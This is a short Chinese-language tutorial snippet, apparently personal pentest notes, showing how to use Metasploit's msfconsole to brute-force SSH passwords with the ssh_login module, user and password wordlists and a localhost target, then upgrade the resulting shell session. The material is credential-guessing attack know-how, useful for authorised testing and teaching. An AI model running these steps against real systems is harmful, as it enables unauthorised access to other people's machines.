打开msfconsole
search ssh
#搜索ssh模块
search mysql
进入ssh爆破模块
search ssh_login
#搜索爆破模块
use 0
#进入ssh爆破模块
show options
#查看对应参数
设置参数获取结果
set RHOSTS 127.0.0.1
set USER_FILE user.txt
set PASS_FILE passwd.txt
run
注意:这里metasploit 在探测ssh 弱口令时,如果发现存在,则会返回一个linux shell ,注意此时不是meterpreter shell 。接下来可以使用sessions –u id 进行升级
search _login
#搜索所有可以爆破的模块